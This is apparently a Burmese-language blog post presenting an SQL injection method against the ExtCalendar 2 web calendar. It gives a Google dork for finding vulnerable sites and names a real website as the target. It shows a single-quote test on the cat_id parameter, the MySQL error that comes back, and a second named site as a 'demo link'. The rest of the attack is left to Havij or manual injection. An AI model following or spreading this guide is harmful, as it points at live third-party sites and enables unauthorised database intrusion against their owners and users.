ExtCalendar 2 SQL Injection Vulnerability

ခုနည္းကေတာ့ အေပာာင္းေလးပါ ဒါေပမယ့္ Website ေတာ္ေတာ္မ်ားမ်ား က်န္ေနပါေသးတယ္...
ဒါေၾကာင့္မသိေသးတဲ့သူေတြသိသြားေအာင္လုိ ့ တင္ေပးလုိက္ပါတယ္..
အရင္ဆုံး www.google.com ကိုသြားလုိက္ပါ..
ျပီးရင္ေတာ့ ေအာက္က Dork ေလးကိုထည့္လုိက္ပါ..
Dork : inurl:calendar.php?mode=cat
[or]
"ExtCalendar 2"
အဲ့မွာ Website ေပါင္းမ်ားစြာ က်လာပါလိမ့္မယ္... ဒီေတာ့ မွ..

မိမိၾကိုက္တဲ့ လင့္တစ္ခုကို သာ ကလစ္နုိပ္ခ်ထလုိက္ပါ..

ကြ်န္ေတာ္ကေတာ့
http://www.thechambersonline.com/calendar3/calendar.php?mode=cat&cat_id=19
ကုိယူလုိက္မယ္ဘဲထားပါေတာ့ဗ်ာ..
အဲ့ေနာက္မွာ sql injection basic code " ' " ဆုိတာေလးကို ထည့္လုိက္ပါမယ္..
ဒီေတာ့ ေအာက္ကလုိ လင့္ေလး ျဖစ္သြားပါမယ္..
http://www.thechambersonline.com/calendar3/calendar.php?mode=cat&cat_id=19'
 ဒီေတာ့ ထြက္လာပါျပီ အေတာင့္လုိက္ၾကီးပါဘဲ.. ေအာက္ကလုိ စာသားေလးနဲ ့ေပ့ါဗ်ာ..
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''19''' at line 1
တဲ့ဗ်ာ.. က်န္တာကေတာ့ Havij နဲ ့ျဖစ္ျဖစ္ လက္နဲ ့ျဖစ္ျဖစ္ မိမိ ၾကိုက္သလုိ လုပ္နုိင္ပါျပီ..
Demo Link :
http://www.notebox.ca/ggmss/calander/calendar.php?mode=cat&cat_id=6'

Please Give Us Your 1 Minute In Sharing This Post!

SOCIALIZE IT →

Tweet

FOLLOW US →

SHARE IT →

Powered By: BloggerYard.Com